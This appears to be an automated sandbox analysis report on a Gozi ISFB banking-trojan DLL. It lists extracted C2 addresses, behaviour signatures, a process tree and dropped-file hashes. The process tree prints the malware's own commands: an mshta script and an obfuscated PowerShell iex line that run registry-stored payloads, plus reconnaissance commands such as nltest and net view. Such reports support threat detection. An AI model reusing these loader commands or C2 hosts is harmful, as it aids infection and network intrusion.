Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220722-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2022 12:29

General

  • Target

    f9d778ad3bfea174401f36a2d88851d8.dll

  • Size

    378KB

  • MD5

    f9d778ad3bfea174401f36a2d88851d8

  • SHA1

    fd2b30e2f029939c31c759d9fbdd5ee5242137c0

  • SHA256

    44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5

  • SHA512

    046ee69e01fc2e64b3cf75ccfa9a0886ef4e6752f9d90e199c67b8cc9cfdf767d8235b3a638fc96782cea0ff1b278f8d36a2ea25c9a5a839c0c03d199de5175a

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

79.110.52.8

79.110.52.80

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

79.110.52.82

79.110.52.94

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3520
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:3256
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4816
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3784
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1028
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1184
          • C:\Windows\SysWOW64\regsvr32.exe
            /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1716
            • C:\Windows\system32\control.exe
              C:\Windows\system32\control.exe -h
              4⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4028
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                5⤵
                  PID:4244
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "about:<hta:application><script>U8sf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U8sf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\FAC9767C-11D1-3C57-6BCE-D530CFE2D964\\\LineStop'));if(!window.flag)close()</script>"
            2⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:376
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bjunbw -value gp; new-alias -name dqmwsgwvn -value iex; dqmwsgwvn ([System.Text.Encoding]::ASCII.GetString((bjunbw "HKCU:Software\AppDataLow\Software\Microsoft\FAC9767C-11D1-3C57-6BCE-D530CFE2D964").MaskStop))
              3⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1520
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2812
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp" "c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP"
                  5⤵
                    PID:3684
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3736
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5087.tmp" "c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP"
                    5⤵
                      PID:4164
              • C:\Windows\system32\cmd.exe
                cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4196
                • C:\Windows\system32\more.com
                  more
                  3⤵
                    PID:3084
                • C:\Windows\syswow64\cmd.exe
                  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                  2⤵
                    PID:3240
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                    2⤵
                      PID:1224
                    • C:\Windows\system32\cmd.exe
                      cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2348
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo.exe
                        3⤵
                        • Gathers system information
                        PID:3636
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                      2⤵
                        PID:1308
                      • C:\Windows\system32\cmd.exe
                        cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                        2⤵
                          PID:1448
                          • C:\Windows\system32\net.exe
                            net view
                            3⤵
                            • Discovers systems in the same network
                            PID:2136
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                          2⤵
                            PID:3756
                          • C:\Windows\system32\cmd.exe
                            cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                            2⤵
                              PID:3588
                              • C:\Windows\system32\nslookup.exe
                                nslookup 127.0.0.1
                                3⤵
                                  PID:3116
                              • C:\Windows\system32\cmd.exe
                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                2⤵
                                  PID:4924
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                  2⤵
                                    PID:396
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist.exe /SVC
                                      3⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1208
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                    2⤵
                                      PID:1272
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                      2⤵
                                        PID:5004
                                        • C:\Windows\system32\driverquery.exe
                                          driverquery.exe
                                          3⤵
                                            PID:1956
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                          2⤵
                                            PID:4560
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                            2⤵
                                              PID:5076
                                              • C:\Windows\system32\reg.exe
                                                reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                                3⤵
                                                  PID:3164
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                2⤵
                                                  PID:3428
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                  2⤵
                                                    PID:2076
                                                    • C:\Windows\system32\net.exe
                                                      net config workstation
                                                      3⤵
                                                        PID:3636
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 config workstation
                                                          4⤵
                                                            PID:4304
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                        2⤵
                                                          PID:3632
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                          2⤵
                                                            PID:4992
                                                            • C:\Windows\system32\nltest.exe
                                                              nltest /domain_trusts
                                                              3⤵
                                                                PID:3960
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                              2⤵
                                                                PID:4552
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                                2⤵
                                                                  PID:4508
                                                                  • C:\Windows\system32\nltest.exe
                                                                    nltest /domain_trusts /all_trusts
                                                                    3⤵
                                                                      PID:2812
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                                    2⤵
                                                                      PID:3272
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                                      2⤵
                                                                        PID:1160
                                                                        • C:\Windows\system32\net.exe
                                                                          net view /all /domain
                                                                          3⤵
                                                                          • Discovers systems in the same network
                                                                          PID:2588
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                                        2⤵
                                                                          PID:856
                                                                        • C:\Windows\system32\cmd.exe
                                                                          cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3BC.bin1"
                                                                          2⤵
                                                                            PID:4352
                                                                            • C:\Windows\system32\net.exe
                                                                              net view /all
                                                                              3⤵
                                                                              • Discovers systems in the same network
                                                                              PID:4452
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic computersystem get domain
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4012

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v6

                                                                        Replay Monitor

                                                                        Loading Replay Monitor...

                                                                        Downloads

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          44B

                                                                          MD5

                                                                          f7aea2435aa888b709ca20f816c33bfd

                                                                          SHA1

                                                                          38717c9a73b5f8bd399839cbe0aa57518427e758

                                                                          SHA256

                                                                          f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

                                                                          SHA512

                                                                          1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          MD5

                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                          SHA1

                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                          SHA256

                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                          SHA512

                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          debbdb9be3bb09adf5d355ab9c36187a

                                                                          SHA1

                                                                          f44a6c37253abc4ad266d46b4b62d50398e0c570

                                                                          SHA256

                                                                          cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643

                                                                          SHA512

                                                                          f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          debbdb9be3bb09adf5d355ab9c36187a

                                                                          SHA1

                                                                          f44a6c37253abc4ad266d46b4b62d50398e0c570

                                                                          SHA256

                                                                          cf7ef451454095e3ea0011ce0aa85072d81794210f496506388ed080671bf643

                                                                          SHA512

                                                                          f6c682f54d4b64bbf5554ba9af9a39645de00885a9819eb6a76a61d5539fa888c39602a03cc6ba1bfaa0b30c101b1092217c3e8ef288426f71c3411fa0b68332

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          d4261765df37d03c995a3f88337551b9

                                                                          SHA1

                                                                          31303377a5d5808157badd5a7be5c87f673d937a

                                                                          SHA256

                                                                          26b2ede70ff95672d6c7c3ad8a6140e333ff97d8671c56a4ecbf2527ceec3a08

                                                                          SHA512

                                                                          4b7fa34739bc78de8a0a5d71ea56a47d34f107ba9dd543e87a0e74c92e0f21b14c06c8c1ed904a693b3e2037a52a87ffa8545adc2b6de5b132f1579bc9e4ad83

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          f3732be8e8ad283b090cb47ded28b20b

                                                                          SHA1

                                                                          c880ff4fcfcc3d92ffaaa02cb0c38151661989b8

                                                                          SHA256

                                                                          b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b

                                                                          SHA512

                                                                          1eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          2KB

                                                                          MD5

                                                                          f3732be8e8ad283b090cb47ded28b20b

                                                                          SHA1

                                                                          c880ff4fcfcc3d92ffaaa02cb0c38151661989b8

                                                                          SHA256

                                                                          b04651609ff611cd455dfa95c12b5e1bfd6b04baa67fdee66547c08b033bb73b

                                                                          SHA512

                                                                          1eb0395ab8ecfe5e06315d3e71854a6c054821feb36e5d1b431c4ca54e0b07d5ea8ca9b2102d3d627fbdf70691c29cc23e7809acff23d2bcb0e7ad738e40cc5a

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          9KB

                                                                          MD5

                                                                          eafa11d2f82e86981c80a77d3c8621bc

                                                                          SHA1

                                                                          c796b1c198d2c0d3acd73215bb3320b8261d660a

                                                                          SHA256

                                                                          6cb061fa9c465cab49795750b943a79832c1d5dbc685e7ab6e4e6b2d5d6e4880

                                                                          SHA512

                                                                          d95abdc4cbd9b3c1775bf8eee76651daad15dacbad3888b0a36e54a3a76169dbb624e11bcad43d204ffc650169d657974be12a7bf93fb5dc3dc94e51e2e5c2cf

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          9KB

                                                                          MD5

                                                                          28cefb694a0586baee4068b1b707ee3f

                                                                          SHA1

                                                                          5d90d010403e168576e861f9f5dc832649fb1fa5

                                                                          SHA256

                                                                          dcf901d2adf9af1ae75fabf121e350849d03cb0b2c2aabefdc06f25cb1ba58fc

                                                                          SHA512

                                                                          ed219a37df106104237d5034e18f5ebb6f4d766df140586848597f7bf773e22dde330f9d9be3a71f3214a143556c9a4e0cf347376979cdbcbece7d3604f7a0ec

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          35KB

                                                                          MD5

                                                                          91dd82dc33272e52b2b0634128912fc3

                                                                          SHA1

                                                                          5b31d5b431db80873bc8501ca96401c69da84e76

                                                                          SHA256

                                                                          533b8a08428ee97abe45244f3133ab3d3c40022ecef388d6aa5cbff79c784c9b

                                                                          SHA512

                                                                          19c4165763766db298c97c2254e5285560526f2bbb5a21ac84dbdd2fd116b6fdb01de5d447cb34c2a150f14ce8d1a546a317460715dd54a3bc9890a17c374348

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          35KB

                                                                          MD5

                                                                          91dd82dc33272e52b2b0634128912fc3

                                                                          SHA1

                                                                          5b31d5b431db80873bc8501ca96401c69da84e76

                                                                          SHA256

                                                                          533b8a08428ee97abe45244f3133ab3d3c40022ecef388d6aa5cbff79c784c9b

                                                                          SHA512

                                                                          19c4165763766db298c97c2254e5285560526f2bbb5a21ac84dbdd2fd116b6fdb01de5d447cb34c2a150f14ce8d1a546a317460715dd54a3bc9890a17c374348

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          bc99dc8482dbf6e658713e410a772962

                                                                          SHA1

                                                                          5120b2893f19960db065bc2fc777941ad8a7e4f7

                                                                          SHA256

                                                                          39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b

                                                                          SHA512

                                                                          3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          bc99dc8482dbf6e658713e410a772962

                                                                          SHA1

                                                                          5120b2893f19960db065bc2fc777941ad8a7e4f7

                                                                          SHA256

                                                                          39080d4c825ce4ddc40b2d8266888806572e688728d7bc040408d20a82343d0b

                                                                          SHA512

                                                                          3bc5ef394d549b2ab0c8c2e1c69d6c10dad924adb98cf67f13463fcd88f48022886c17d601ba839d7c61cfa20ace99bb76f4ef7df07811eb68046ac257ded7f2

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          9584e50ab516f8f3d8473f756acf9a7c

                                                                          SHA1

                                                                          f3ef6233adf9681aefbf67c2c83566518c921ee6

                                                                          SHA256

                                                                          287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd

                                                                          SHA512

                                                                          5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          9584e50ab516f8f3d8473f756acf9a7c

                                                                          SHA1

                                                                          f3ef6233adf9681aefbf67c2c83566518c921ee6

                                                                          SHA256

                                                                          287dc1224253a6cb5e5c220f6193da429a37fe93090cf4ecf21591f14cfa9afd

                                                                          SHA512

                                                                          5a0660cd05081cb4023e5f688fe90f61ff8d1a540d5a0e8192b54fb59d299079a2025e0a060be531895a825cb1638508136b4c27372f4ef818db28d79667b1c5

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          d8cf63e49c3f22e79e05dde487f6f2f2

                                                                          SHA1

                                                                          7fc8c73ceaf0d108b9d8a2a325ad05ed1413a104

                                                                          SHA256

                                                                          93e3177026041e353d040d414a06570490aea739a2bcb57520532e8f216749c1

                                                                          SHA512

                                                                          f437bc7bf48089acc46f10596adbf069cc12e8ce5ef6d0520f73e5e828a196e0c4a2b087f118b469deb2795c02c55f53c2a54dfcbc2d85a3a803084d41ecacd8

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          6d26aa73f630a7f0276b0cd428f1de06

                                                                          SHA1

                                                                          5a0084e7e4bd9aff05543636ca23bea0bf0dcb2a

                                                                          SHA256

                                                                          6bdcab6cb14d61e0ccc90a59692b1e44ad4c1624b0628318e2410d9333a12203

                                                                          SHA512

                                                                          a3f6d623a0e7ec89416f28277774c35f146102ab443695cb321c0154ca37061333035bb504bda3d786a00c49c0d1aca51f325eb02623304cd0dfcfd4e244282f

                                                                        • C:\Users\Admin\AppData\Local\Temp\3BC.bin1

                                                                          Filesize

                                                                          64KB

                                                                          MD5

                                                                          4746429b9b2c92103225650b6059c26a

                                                                          SHA1

                                                                          df81d1724ecd7f3c09945120dc0022d0f7d4bb23

                                                                          SHA256

                                                                          f59ddebc18b1d25727aa3ab6f4046c987e063917da6fa0d9419397a6243d0db6

                                                                          SHA512

                                                                          17f0128be903af9bed8f96bd4c296690d0ddf63658b50efca0efa7fea0da07db830e7eae5bdc0c3b7f6da7389a5e528a3929110d731d12c290c5da6c1a943e96

                                                                        • C:\Users\Admin\AppData\Local\Temp\RES4F20.tmp

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          01f190bdaec04de221b7e23b41a74673

                                                                          SHA1

                                                                          32023da04ece8010950b5fab4c491904eeadc205

                                                                          SHA256

                                                                          9cdf726460c06e4331b7a20f0dec43563ccad65d5ff051ad22a0abc7c6688758

                                                                          SHA512

                                                                          47d437eeb7252b7d11d15bba087c5b3bcc782115c642f8efc0fc582286c11717046fd96587cb8a704053a7c7ffa6f63aeb67d3283035e94e32671fc6fadf6bb9

                                                                        • C:\Users\Admin\AppData\Local\Temp\RES5087.tmp

                                                                          Filesize

                                                                          1KB

                                                                          MD5

                                                                          a59eb24fd5eed325703f8d6222d7629c

                                                                          SHA1

                                                                          01a89b751816810e82f56bc7a5b10e8c32baabf1

                                                                          SHA256

                                                                          5cba1917347a9255c50aa22cf47aaf65a3c9eb544960980f61cacf30c3a5b914

                                                                          SHA512

                                                                          096a523455063b05c49e491d3c065351345a9c7fcd82b42bfc9642ee6206e0a3395ed8fdae8990c0ca046fbe7d8de61db08a835904d24b15a7df05a617aa4725

                                                                        • C:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.dll

                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          6ae7ab6abc2bc1ee1a3679f79e3220e0

                                                                          SHA1

                                                                          dd04108b32b3570b14b409f961798359dadae553

                                                                          SHA256

                                                                          5e52468c58b126d14bef7c8d9c611de371ec60caaf61456f334bd5a75173ec5c

                                                                          SHA512

                                                                          7845c853fadea28684338ffe5e2bd5f263030e507faba8dac30176d34eeb01a56e11b7639031c0f31b20d1dd138fa040599b96383eb60e59fa7458b3bddf61c0

                                                                        • C:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.dll

                                                                          Filesize

                                                                          3KB

                                                                          MD5

                                                                          92be12bfb85cea8510497b97e1deb99a

                                                                          SHA1

                                                                          2ae7bc20bf614747a77b9aefb76ab15b3fb66e5f

                                                                          SHA256

                                                                          87d6faa6d06cf1ae59c4c5f969aacd6851b256916ac5a086a6f5ea87509e3700

                                                                          SHA512

                                                                          079c54e47708c06ba73e7ada9bc305ff02493b1fdcd0fc614b8acd3b4f9473c90e3d7bbca67be83c668c9e88c87b7aed30e761dfbad835e6d1f810d29bd9d3ad

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\CSC7A9004E1C5EB484596BB47739548E5.TMP

                                                                          Filesize

                                                                          652B

                                                                          MD5

                                                                          01c7ea8256a930100666ac66c9292ab6

                                                                          SHA1

                                                                          37bf5871ed1239236438b665a914a250f217e32e

                                                                          SHA256

                                                                          78ea4ba18db4484a618b4fc713585d7501d670985caa64d86c5485a2b932ebcb

                                                                          SHA512

                                                                          9f807460bb3b17166e1f6ec2fadbb74daa3b5063e6971383c91c093430e27ea6d723a1c73a345c2576d4ef42c6bc7da72a84083a9675e37507fa3920af2aae97

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.0.cs

                                                                          Filesize

                                                                          400B

                                                                          MD5

                                                                          aca9704199c51fde14b8bf8165bc2a4c

                                                                          SHA1

                                                                          789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                          SHA256

                                                                          cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                          SHA512

                                                                          a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\e25fyw13\e25fyw13.cmdline

                                                                          Filesize

                                                                          369B

                                                                          MD5

                                                                          abe6a4f47746fa860e1827b2c160669a

                                                                          SHA1

                                                                          b4dbfa0ea503c044b4111ab819346464e4f26845

                                                                          SHA256

                                                                          6e99ca8c4c8a091392752e48beb56fe261b7e55e9d51c2904ef221ebf9e038b3

                                                                          SHA512

                                                                          ee7828e0ec18dfb5c2c5421a24021ac7fe81bda3dfbc288bd9a9043da41129ab4b1723f3dac58da79ab0c1d18f12947456944b1089679999cd6a16da62619f60

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP

                                                                          Filesize

                                                                          652B

                                                                          MD5

                                                                          488518a0854dc8d2129d0e1623a37a6a

                                                                          SHA1

                                                                          f5f381735a11d7b572f0f8617afc5ad69cef2cdd

                                                                          SHA256

                                                                          babfdb1d940c0addee61aab483cf71ac5fead11352ae8baa0d980a3bdca8585c

                                                                          SHA512

                                                                          105f4f8ef0aa23ec4d6292f12f925563def203ad669aed110cda635903d721cf05ab39bd6a8d727c602d86ee515c79fe231ae46a5fd827228136f72889a6f329

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.0.cs

                                                                          Filesize

                                                                          410B

                                                                          MD5

                                                                          9a10482acb9e6952b96f4efc24d9d783

                                                                          SHA1

                                                                          5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                          SHA256

                                                                          a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                          SHA512

                                                                          e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline

                                                                          Filesize

                                                                          369B

                                                                          MD5

                                                                          6c9aa04fb876e079685966d995bdb398

                                                                          SHA1

                                                                          5e75d849b04c782604dd2f7e8a7d61c590ad2fe7

                                                                          SHA256

                                                                          9069a1f3043fd0eda2817ba12d85a529e4455af44d411f02bb131451bc50dce8

                                                                          SHA512

                                                                          1161df029aaa506f94b45c1527d031361c189ad1bc3ca899bfcabd016aef5052dbedab3db0b2cd9c74dc90df0dd3c7e92f90df46d8b4695df9371f732fe9987b

                                                                        • memory/396-202-0x0000000000000000-mapping.dmp

                                                                        • memory/856-234-0x0000000000000000-mapping.dmp

                                                                        • memory/1028-181-0x000000000A1C0000-0x000000000A2FA000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1028-165-0x0000000007ED0000-0x0000000007F73000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/1028-190-0x0000000007ED0000-0x0000000007F73000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/1028-175-0x0000000008BB0000-0x0000000008CEB000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1160-231-0x0000000000000000-mapping.dmp

                                                                        • memory/1208-204-0x0000000000000000-mapping.dmp

